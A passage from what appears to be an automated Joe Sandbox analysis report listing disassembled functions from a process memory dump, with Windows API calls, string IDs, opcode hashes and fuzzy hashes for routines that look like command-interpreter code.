                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: memset$ErrorLast$InformationVolume
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: %04X-%04X
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2748242238-1126166780
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 2ac32324d977eb3e4d130b2e0133f8ba2ade16aacb09d6682ea5062a51704fcd
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 88a7bd08ce5ae7a201dae523ff016dadfa6204ef31cd83c37fe09735eeecaa22
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2ac32324d977eb3e4d130b2e0133f8ba2ade16aacb09d6682ea5062a51704fcd
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 109191B1A002299BDB65DA64CC95BEAB7FDEF14308F4405E9F609D3141EB349F848F91
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 0001BC30 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 255COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: wcschr$iswspace
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: =,;
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3458554142-1539845467
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 55268985c2aa4751148f4c39e1de50c94d3f16037663dc5dbf1dfbf48d7cad57
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: d3af5bc8e934c3e4c9508d0374a42338144955cd9d446fd66f442a822befdac6
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 55268985c2aa4751148f4c39e1de50c94d3f16037663dc5dbf1dfbf48d7cad57
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E181A074A00226CBEB749F64DC457FA73F5AF10305F1448AAE98AA7241FB758DC4CB61
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 000223F0 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 176COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • memset.MSVCRT ref: 00022431
                                                                                                                                                                                                                                                                                                                                                                                                                          • memset.MSVCRT ref: 00022452
                                                                                                                                                                                                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0002247C
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001E3F0: memset.MSVCRT ref: 0001E455
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetVolumeInformationW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,00000000,00000000,?,00000000,00000000,?,0001250C,00000000,00000000,?,-00000105,-00000105,-00000105), ref: 00022585
                                                                                                                                                                                                                                                                                                                                                                                                                          • _wcsicmp.MSVCRT ref: 000225A3
                                                                                                                                                                                                                                                                                                                                                                                                                          • ??_V@YAXPAX@Z.MSVCRT(00000000,00000000,?,-00000105,-00000105,-00000105,?,?,?,?,?,?,?,?), ref: 000225CA
                                                                                                                                                                                                                                                                                                                                                                                                                          • ??_V@YAXPAX@Z.MSVCRT(00000000,00000000,?,-00000105,-00000105,-00000105,?,?,?,?,?,?,?,?), ref: 000225E3
                                                                                                                                                                                                                                                                                                                                                                                                                          • ??_V@YAXPAX@Z.MSVCRT(00000000,00000000,?,-00000105,-00000105,-00000105,?,?,?,?,?,?,?,?), ref: 0002F32B
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: memset$InformationVolume_wcsicmp
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: FAT
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 4247940253-238207945
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: d5d5d618410109c99f871daaf4a0c4818053005945250bf0739a1265f873d210
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 73d24782f3337ad2d87fa55b7891693ee002a7aa1cdf26295c91fdf159af64d2
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d5d5d618410109c99f871daaf4a0c4818053005945250bf0739a1265f873d210
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9451CBB2900625ABEF24CBA4EC957EE77B8EB44345F1400E9A509D3141DB38DF84CF25
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00017334 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 159COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • memset.MSVCRT ref: 00017381
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001E3F0: memset.MSVCRT ref: 0001E455
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,?,?,-00000209,?,00000000,?), ref: 000173D6
                                                                                                                                                                                                                                                                                                                                                                                                                          • wcsncmp.MSVCRT ref: 000173F9
                                                                                                                                                                                                                                                                                                                                                                                                                          • ??_V@YAXPAX@Z.MSVCRT(?,-00000209,?,00000000,?), ref: 00017465
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0(?,00001037,00000000,?,?), ref: 0002A8C6
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00020060: wcschr.MSVCRT ref: 0002006C
                                                                                                                                                                                                                                                                                                                                                                                                                          • wcsstr.MSVCRT ref: 0002A87E
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 0002A89B
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0(?), ref: 0002A8DE
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0002589A: FindFirstFileExW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,?,00000000,00000000,00000002,00000000,00000000,?,000259D0,?,00016054,-00001038,00000000,?,?), ref: 000258BB
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0002589A: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,000259D0,?,00016054,-00001038,00000000,?,?,00000000,00000000,-00000001), ref: 000258CD
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 00018B4D: FindClose.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000,000399FD,00000000,?,00000000,0002CF94,00000000,?), ref: 00018B7B
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: File$AttributesFindmemset$CloseDriveErrorFirstFullLastNamePathTypewcschrwcsncmpwcsstr
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: \\.\
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 799470305-2900601889
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 08038ae82cd0eda0c85c2ded9e0f299a3dfd11ed520a2926c54681cff88b7a94
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: e1dc8387a6c345b658638cb58e893b7397aefacfa5f7ee4701dd8c2e924a494e
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 08038ae82cd0eda0c85c2ded9e0f299a3dfd11ed520a2926c54681cff88b7a94
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E15116717083119BD7309B70A8846AFBBE8EF8A710F00092AF959C3291EF74D9858763
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 0001CB09 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 101COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: wcschr$iswspace$_wcsicmp
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: &<|>$+: $=,;
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 3089800946-2256444845
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 8856307f72b1212e02cc9c9d4c667af19b244b5afe3bd49712b041d94b09f944
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: eb64e7ccda42b9191f672477f00f4d960637dcc2e81e3e1d6b38bcc5f997bd82
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8856307f72b1212e02cc9c9d4c667af19b244b5afe3bd49712b041d94b09f944
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3E310871A0033447EB208B65AC897EF77E5AF56309F140166EC09D3212E775CEA4CBA7
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 0003BAF8 Relevance: 16.1, APIs: 8, Strings: 1, Instructions: 336COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0003C0F8: free.MSVCRT ref: 0003C116
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0003C0F8: free.MSVCRT ref: 0003C123
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001DCD0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,0001ACD8,00000001,?,00000000,00018C23,-00000105,0003C9B0,00000240,00021E92,00000000,00000000,0002ACE0,00000000), ref: 0001DCE1
                                                                                                                                                                                                                                                                                                                                                                                                                            • Part of subcall function 0001DCD0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,0001ACD8,00000001,?,00000000,00018C23,-00000105,0003C9B0,00000240,00021E92,00000000,00000000,0002ACE0,00000000,00000000), ref: 0001DCE8
                                                                                                                                                                                                                                                                                                                                                                                                                          • longjmp.MSVCRT(00050A30,00000001,00000000,?,00000000), ref: 0003BB97
                                                                                                                                                                                                                                                                                                                                                                                                                          • qsort.MSVCRT ref: 0003BC1A
                                                                                                                                                                                                                                                                                                                                                                                                                          • wcschr.MSVCRT ref: 0003BC6F
                                                                                                                                                                                                                                                                                                                                                                                                                          • calloc.MSVCRT ref: 0003BCB1
                                                                                                                                                                                                                                                                                                                                                                                                                          • calloc.MSVCRT ref: 0003BD82
                                                                                                                                                                                                                                                                                                                                                                                                                          • wcschr.MSVCRT ref: 0003BDCB
                                                                                                                                                                                                                                                                                                                                                                                                                          • memcpy.MSVCRT(00000000,?,?), ref: 0003BE1D
                                                                                                                                                                                                                                                                                                                                                                                                                          • memcpy.MSVCRT(00000000,?,?), ref: 0003BE3E
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: Heapcallocfreememcpywcschr$AllocProcesslongjmpqsort
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: &()[]{}^=;!%'+,`~
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 975110957-381716982
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: ece39f86db4ec95bf65a5363b6f2852eec9b6880ec334a3cb009f82e53dc72be
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 16cf95b917d082d77fd2937cabb69a5a783cc4b96801ef10493332cf271406a9
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ece39f86db4ec95bf65a5363b6f2852eec9b6880ec334a3cb009f82e53dc72be
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F3C1BE76A042159BEB758F68D841BEEB7F5FF48714F14406AEA48EB342EB309D80CB54
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 0001B760 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 286COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • _tell.MSVCRT ref: 0001B7F9
                                                                                                                                                                                                                                                                                                                                                                                                                          • _close.MSVCRT ref: 0001B82C
                                                                                                                                                                                                                                                                                                                                                                                                                          • memset.MSVCRT ref: 0001B8CC
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetConsoleOutputCP.API-MS-WIN-CORE-CONSOLE-L1-1-0(00007FE7), ref: 0001B936
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetCPInfo.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00000000,0004C9F0), ref: 0001B947
                                                                                                                                                                                                                                                                                                                                                                                                                          • ??_V@YAXPAX@Z.MSVCRT(?), ref: 0001B96D
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: ConsoleInfoOutput_close_tellmemset
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: GOTO
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 1380661413-1693823284
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 280e98867902c43aa43e650930bb9be14ba9fec4e13724f4881f88d5ea396512
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 47b7e61b8eab5d3d2cd53cb92752803a280d0d53f4f15c5f86e40f6b2a018e1d
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 280e98867902c43aa43e650930bb9be14ba9fec4e13724f4881f88d5ea396512
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4AB1F270A083118BEB70DF24D944BAFB7E5AF85704F14092DE88587292EB74DD85CB93
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00023065 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 152COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: _errnoiswdigit$iswalphawcschrwcstolwcstoul
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: +-~!
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 2191331888-2604099254
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 924090b3b02bf839346dd3d01a0dd6188cc8a3184cf452eae4a0372fd8e0c322
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 2d04060298c8d11309c6bc22a11cb651b024431490e682b13e5ff892d6b5a1ae
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 924090b3b02bf839346dd3d01a0dd6188cc8a3184cf452eae4a0372fd8e0c322
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2D51AC71500229EBCB14DF64E8899EF37B5EF06361B108526FD069B150EBB9DF50CBA1
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00037220 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 138COMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • towupper.MSVCRT ref: 00037277
                                                                                                                                                                                                                                                                                                                                                                                                                          • iswalpha.MSVCRT ref: 000372AA
                                                                                                                                                                                                                                                                                                                                                                                                                          • towupper.MSVCRT ref: 000372BD
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetVolumeInformationW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000101,?,00000000,00000000,00000000,00000000), ref: 000372EF
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00037304
                                                                                                                                                                                                                                                                                                                                                                                                                          • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00037311
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: ErrorLasttowupper$InformationVolumeiswalpha
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: $%04X-%04X$\
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 4001382275-467840296
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: bb189462e48d268fbe554d6d6394e8207ee48eccbd446e380f73a37c5eb92a82
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: a7d370b7a7a3dfb36078361d5d31449aed652e2a5bbcc3210ed1686cea98d0ff
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bb189462e48d268fbe554d6d6394e8207ee48eccbd446e380f73a37c5eb92a82
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 61412BB1208300AAE7306BA59C0AEFB77ECDF84B11F00441EF949D61C1EB749A80D7A2
                                                                                                                                                                                                                                                                                                                                                                                                                          Function 00032D1F Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 101synchronizationCOMMON
                                                                                                                                                                                                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                                                                                                                                                          • WaitForSingleObject.API-MS-WIN-CORE-SYNCH-L1-1-0(00000000,00000000,00000000,00000000,?,00000000,00000000,?,00033877), ref: 00032D31
                                                                                                                                                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1558521903.0000000000011000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00010000, based on PE: true
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558485603.0000000000010000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558554013.000000000003E000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005A000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1558587325.000000000005E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_10000_alpha.jbxd
                                                                                                                                                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                                                                                                                                                          • API ID: ObjectSingleWait
                                                                                                                                                                                                                                                                                                                                                                                                                          • String ID: wil
                                                                                                                                                                                                                                                                                                                                                                                                                          • API String ID: 24740636-1589926490
                                                                                                                                                                                                                                                                                                                                                                                                                          • Opcode ID: 2966e31612bd8e17abc4b69c2d5de50fa611ff5b7593c291ac0b5fd3b4e653ce
                                                                                                                                                                                                                                                                                                                                                                                                                          • Instruction ID: 7a3111306232f2ab0718f4e86f5581d6e71e659dbe564042df062b542268d427
